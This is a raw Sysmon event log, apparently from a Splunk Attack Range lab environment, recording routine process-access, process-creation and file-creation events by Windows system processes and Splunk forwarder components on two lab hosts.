08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.728{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.713{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4833EA82918A4A742F3C7202CAD817E3,SHA256=19B7A629FDA6A1B5814D26C5C1C8D770FF54C79F5DC2EB38FCDDB7A6A935FC2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:25.201{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=7B12963036AF60B7573E9578151B5E0A,SHA256=935A96DB9B5B887C5739DC57312FA38A1FBC31E83C339E545514B017AFB6ED69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:25.001{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D2273E29FBFBA898992B6A0FC7E457,SHA256=7C0FAE37C59D846EB216F02CEF8354BEE11A60A2D852604E8C08721C41908CFE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CE07D3D07248F27564C05BF4FA0DD83,SHA256=C220CDE339505C39CF2266D11F5DEBD942FBB8CEDED31F578A5799E315E11D8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F0DE248AB634C0E3816254076BD28E3,SHA256=1E04915CF7A297560B239861BDA3B1FF8B8EF54BD2ECC51981D742F7FA61803A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.025{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
